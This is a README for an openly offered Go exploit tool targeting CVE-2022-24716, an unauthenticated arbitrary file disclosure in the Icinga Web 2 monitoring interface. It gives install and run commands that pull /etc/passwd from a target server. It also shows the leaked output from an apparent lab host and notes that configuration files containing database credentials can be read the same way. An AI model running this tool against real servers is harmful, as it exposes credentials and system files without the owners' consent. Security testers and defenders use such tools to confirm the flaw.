CVE-2022-24716 (Arbitrary File Disclosure Icingaweb2)

joaoviictorti/CVE-2022-24716

CVE-2022-24716

Icinga Web 2 is an open source monitoring web interface, framework and command line interface. Unauthenticated users can leak the contents of user-accessible local system files from the web server, including icingaweb2 configuration files with database credentials.

Installation

This tool requires Go. To install it, run:

go install -v github.com/joaoviictorti/CVE-2022-24716@latest

Usage

go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd 
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd -p http://127.0.0.1:8080

The -h switch displays help for the tool. Here are all the switches it supports:

usage: CVE-2022-24716 [-h|--help] -u|--url "<value>" -f|--file "<value>"
                      [-p|--proxy "<value>"]

                      CVE-2022-24716 - Arbitrary File Disclosure

Arguments:

  -h  --help   Print help information
  -u  --url    Insert url
  -f  --file   Insert file
  -p  --proxy  Insert proxy

Running CVE-2022-24716

go run .\CVE-2022-24716.go -u http://icinga.cerberus.local:8080 -f /etc/passwd  

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
......
